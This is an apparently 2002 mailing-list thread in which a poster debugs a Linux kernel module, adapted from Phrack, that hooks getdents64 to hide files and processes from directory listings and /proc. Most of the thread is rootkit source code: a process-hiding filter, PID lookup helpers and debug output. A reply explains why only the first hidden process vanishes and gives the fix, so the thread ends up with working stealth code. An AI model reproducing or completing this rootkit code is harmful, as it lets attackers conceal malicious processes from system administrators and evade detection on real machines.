let's forget about the error checking and the printk's and the fact
that this function by itself is useless..

I'll put some stuff into it though, inline.

On Thu, Aug 29, 2002 at 03:04:37PM +0300, Muli Ben-Yehuda wrote:
> On Thu, Aug 29, 2002 at 02:57:46PM +0300, Guy Cohen wrote:
> > Here's a little modified (just a bit) snippet from phreak about
> > how to hide files and processes. Can anyone answer me why
> > it exits after it finds the first hidden process, and doesn't go
> > on to hide the second hidden process?
> 
> Nope, you provided incomplete and buggy code. Please post the entire
> snippet if you want meaningful comments. 
> 
> Comments inline. 
> 
> > Thanks,
> > 
> >   Guy
> > 
> > <+++>
more code:

> > char hidden[] = "hidden";
 /* Marker that invisible() looks for in task->comm. It is the same string
    as the `hidden` file-name marker quoted above; note the test in
    invisible() is strstr(), so a process is hidden whenever its comm
    merely *contains* this substring. */
 char mtroj[] = "hidden";

/*convert a string to number*/
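/*
 * Convert a string of decimal digits to a non-negative int.
 *
 * Used on /proc directory-entry names to recover a PID before asking
 * invisible() about it. Returns -1 when the string is NULL or empty,
 * contains any non-digit character (so entries such as "self" or
 * "cpuinfo" are rejected, as is a leading '-'), or does not fit in an
 * int. The overflow check matters because signed overflow is undefined
 * behaviour, and /proc entry names are not under our control.
 */
int myatoi(char *str)
{
 const int int_max = (int)(~0u >> 1); /* INT_MAX without <limits.h> */
 int res = 0;
 char *ptr;

 /* an empty string is not a number; reject it before the digit loop */
 if (str == NULL || *str == '\0')
  return (-1);

 for (ptr = str; *ptr != '\0'; ptr++) {
  int digit;

  if (*ptr < '0' || *ptr > '9')
   return (-1);
  digit = *ptr - '0';
  /* refuse before res * 10 + digit would exceed INT_MAX */
  if (res > (int_max - digit) / 10)
   return (-1);
  res = res * 10 + digit;
 }
 return (res);
}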


/*get task structure from PID*/
/*
 * Look up the task_struct whose pid equals `pid`.
 *
 * Starts at `current` and follows ->next_task around the circular task
 * list until it arrives back at `current`. Returns the matching task, or
 * NULL when no task on the list has that pid.
 *
 * NOTE(review): the walk holds no lock on the task list, so a task that
 * exits concurrently can be unlinked while we are on it -- confirm the
 * caller holds the tasklist read lock, or take it here.
 */
struct task_struct *get_task(pid_t pid)
{
 struct task_struct *start = current;
 struct task_struct *walk = start;

 for (;;) {
  if (walk->pid == pid)
   return walk;
  walk = walk->next_task;
  if (walk == start)
   break;
 }
 return NULL;
}

/*check whether we need to hide this process*/
/*
 * Decide whether the process with PID `pid` must be hidden from /proc.
 *
 * Returns 1 when a task with that pid exists and its comm name contains
 * `mtroj` as a substring (strstr), 0 otherwise -- including when no task
 * has that pid. Because this is a substring test, any process whose comm
 * merely contains the marker matches as well; comm is the kernel's short
 * command name, not the full command line (presumably truncated -- verify
 * against the task_struct definition in use).
 *
 * Both printk()s run for every /proc entry of every getdents64() call,
 * so they are a very loud tell-tale in the kernel log.
 */
int invisible(pid_t pid)
{
 struct task_struct *task;

 task = get_task(pid);
 if (task == NULL)
  return 0;

 printk("IS IT?: %s\n", task->comm);
 if (strstr(task->comm, mtroj) == NULL)
  return 0;

 printk("GOT IT IT'S: %s\n", task->comm);
 return 1;
}

> > [...]
> > int n_getdents64(unsigned int fd, struct dirent64 *dirp, unsigned int count)
> > {
> >    unsigned int tmp, n;
> >    int t, proc=0;
> >    struct inode *dinode;
> >    struct dirent64 *dirp2, *dirp3;
> > 
> >    tmp = (*orig_getdents64) (fd, dirp, count);
> > 
> >    dinode = current->files->fd[fd]->f_dentry->d_inode;
> > 
> >    if( dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
> >         MINOR(dinode->i_dev) == 2)
> >     proc = 1;

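/*
 * Debug trace of the /proc-root test above. This runs for *every*
 * getdents64() on the system, so expect the kernel log to fill up.
 * dinode was taken from current->files->fd[fd] above with no check that
 * fd is valid, so the dereference here can oops on a bad fd.
 *
 * Format specifiers: i_ino and PROC_ROOT_INO are widened to unsigned long
 * and printed with %lu (the exact type of i_ino depends on the kernel
 * version, so the cast keeps the format correct either way); !MAJOR() is
 * an int (%d); MINOR() is cast to unsigned int for %u; tmp is declared
 * unsigned int (%u) -- a negative error return from orig_getdents64()
 * therefore shows up here as a huge number, which is the value tmp
 * really holds, not a printing artefact.
 */
printk(KERN_DEBUG "+++\n");
printk(KERN_DEBUG "dinode->i_ino(%lu) == %lu\n",
       (unsigned long) dinode->i_ino, (unsigned long) PROC_ROOT_INO);
printk(KERN_DEBUG "!MAJOR(dinode->i_dev) == %d\n", !MAJOR(dinode->i_dev));
printk(KERN_DEBUG "MINOR(dinode->i_dev) == %u\n",
       (unsigned int) MINOR(dinode->i_dev));
printk(KERN_DEBUG "tmp = %u\n", tmp);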

> > 
> >  /*dinode is the inode of the required directory*/
> >  if (tmp > 0)
> >  {
> >   /*dirp2 is a new dirent structure*/
> >   dirp2 = (struct dirent64 *) kmalloc(tmp, GFP_KERNEL);
> 
> BAD MISTAKE, no checking for malloc failure. 

Yes yes, but i love to seg fault in the kernel :) (To be precise: a NULL from kmalloc goes straight into copy_from_user() below, which is a kernel oops, not a user-space segfault. The same path is reached whenever orig_getdents64() returns a negative error -- tmp is unsigned int, so `tmp > 0` is true and kmalloc is asked for an absurd size -- and `current->files->fd[fd]` above is dereferenced before any of that, with no check on fd at all.)

> 
> >   /*copy original dirent structure to dirp2*/
> >   copy_from_user(dirp2, dirp, tmp);
> 
> And no checking for copy_from_user failing.
> 
>  
> >   /*dirp3 points to dirp2*/
> >   dirp3 = dirp2;
> > 
> >   t = tmp;
> > 
> >   while (t > 0)
> >   {
> >    n = dirp3->d_reclen;
> >    t -= n;
> > 

<lets say /*>
> >    /*check if current filename is the name of the file we want to hide*/
> >    /* or pid */
> >    if ( (strstr((char *) &(dirp3->d_name), (char *) &hidden) != NULL) ||
> >     (proc && invisible(myatoi(dirp3->d_name))))
> 
> where is invisible defined? myatoi? 
<because i don't care about hidden files atm */ 

     if (proc && invisible(myatoi(dirp3->d_name)))

> 
> >    {
> >     /*modify dirent struct if necessary*/
> >     if (t != 0)
> >      memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
> 
> this looks... suspicious. 

  This is the main event :) -- and the reason the second process survives: memmove() slides every following entry down over the hidden one, so afterwards dirp3 already points at the *next* entry. The advance a few lines below (`dirp3 = ... + dirp3->d_reclen` when t != 0) runs regardless of whether the entry was just removed, so it steps over that next entry without checking it, and because that entry's d_reclen is never subtracted from t the loop also runs on past the last real entry. Advance dirp3 only when the current entry was kept, i.e. make that advance the `else` branch of the hide test.

> 
> >     else
> >      dirp3->d_off = 1024;
> >     tmp -= n;
> >    }
> > 
> >    if (t != 0)
> >     dirp3 = (struct dirent64 *) ((char *) dirp3 + dirp3->d_reclen);
> > 
> >   }
> > 
> >   copy_to_user(dirp, dirp2, tmp);
> 
> Need to check here as well. 
> 
> >   kfree(dirp2);
> >  }
> >   return tmp;
> > }
> > 
> > <--->
> > 
> > If you want to see a little KERN_DEBUG:
> 
> There's not a single printk in the snippet above. Where is this log
> from?
> 
> > ps was run after
> > /hiddensleep &
> > /hiddensleep2 &
> > 
> > [...]
> > Aug 29 14:40:22 arpo kernel: IS IT?: hiddensleep
> > Aug 29 14:40:22 arpo kernel: GOT IT, IT'S: hiddensleep
> > Aug 29 14:40:22 arpo kernel: tmp = 456, t = 48, n = 24
> > Aug 29 14:40:22 arpo kernel: IS IT?: ps
> > Aug 29 14:40:22 arpo kernel: IS IT?: ps
> > Aug 29 14:40:22 arpo kernel: IS IT?: less
> > Aug 29 14:40:22 arpo kernel: +++
> > Aug 29 14:40:22 arpo kernel: dinode->i_ino(1) == 1
> > Aug 29 14:40:22 arpo kernel: !MAJOR(dinode->i_dev) == 1
> > Aug 29 14:40:23 arpo kernel: MINOR(dinode->i_dev) == 2
> > Aug 29 14:40:23 arpo kernel: tmp = 0
> > [end]
> > 
> > 
> > BTW: I know some of you probably wrote a better module that does this
> > and even more.. I'm not interested in getting its source (it's just too easy),
> > I want to keep working on mine.
> 
> Sure, but do it right...


Thanks
  Guy


-- 
Unix Administration,       |      http://www.unixadmin.co.il
locally and remotely.      |      [EMAIL PROTECTED]
Planning, installation,    |      Phone: 972-3-6201373
support & upgrades.        |      Location: Unrestricted
